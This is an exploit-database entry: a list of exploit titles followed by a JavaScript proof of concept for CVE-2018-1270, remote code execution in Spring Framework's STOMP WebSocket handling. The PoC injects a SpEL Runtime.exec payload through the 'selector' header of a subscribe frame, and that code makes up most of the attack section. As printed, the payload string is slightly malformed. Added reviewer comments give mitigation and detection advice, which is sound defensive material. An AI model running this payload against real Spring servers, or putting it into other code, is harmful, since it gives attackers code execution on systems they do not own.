
9 changes to exploits/shellcodes GNU Barcode 0.99 - Buffer Overflow GNU Barcode 0.99 - Memory Leak IssueTrak 7.0 - SQL Injection Sitemakin SLAC 1.0 - 'my_item_search' SQL Injection NUUO NVRmini2 / NVRsolo - Arbitrary File Upload MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting Pivotal Spring Java Framework < 5.0 - Remote Code Execution Facebook Clone Script 1.0.5 - 'search' SQL Injection Facebook Clone Script 1.0.5 - Cross-Site Request Forgery
# Exploit Title: Pivotal Spring Java Framework < 5.0 - Remote Code Execution
# Date: 2018-05-28
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage:
# https://pivotal.io/agile/press-release/pivotal-releases-spring-framework-for-modern-java-application-development
# CVE: CVE-2018-1270
# Version: <= 5.0.x
# Description: By connecting to a Spring STOMP endpoint and setting the "selector"
# header, we can execute code on Spring.
# POC:
# Here we are writing Java commands to be executed within the selector header
# Connecting to a web socket using SockJS
# Ref: https://docs.spring.io/spring/docs/current/spring-framework-reference/web.html#websocket-stomp-enable
// Proof-of-concept listing for CVE-2018-1270, with the selector string kept
// exactly as it was published.
//
// Reviewer notes (defensive reading):
//  - The only attacker-controlled input here is the "selector" header that is
//    attached to the STOMP SUBSCRIBE frame. The T(...) form is Spring
//    Expression Language (SpEL) type-reference syntax, so the issue is the
//    server evaluating a client-supplied header as an expression.
//  - Mitigation: run a Spring Framework release that the vendor advisory for
//    CVE-2018-1270 lists as fixed, and do not expose STOMP-over-WebSocket
//    endpoints to unauthenticated clients unless that is required.
//  - Detection: SUBSCRIBE frames that carry a "selector" header are uncommon
//    in most applications; log them and alert on values containing
//    expression syntax such as "T(".
var header = {
  selector: "T(java,lang.Runtime).getRuntime().exec('open -a Calculator",
};

// SockJS transport to the application's WebSocket endpoint, wrapped in a
// STOMP client.
var socket = new SockJS('/gs-guide-websocket');
var stompClient = webstomp.over(socket);

stompClient.connect({}, (frame) => {
  setConnected(true);
  console.log('Connected: ' + frame);

  // Handler for messages delivered on the subscribed topic.
  const onGreeting = (greeting) => {
    const payload = JSON.parse(greeting.body);
    showGreeting(payload.content);
  };

  // The third argument is the header map sent with the SUBSCRIBE frame; this
  // is where the "selector" value reaches the server.
  stompClient.subscribe('/topic/greetings', onGreeting, header);
});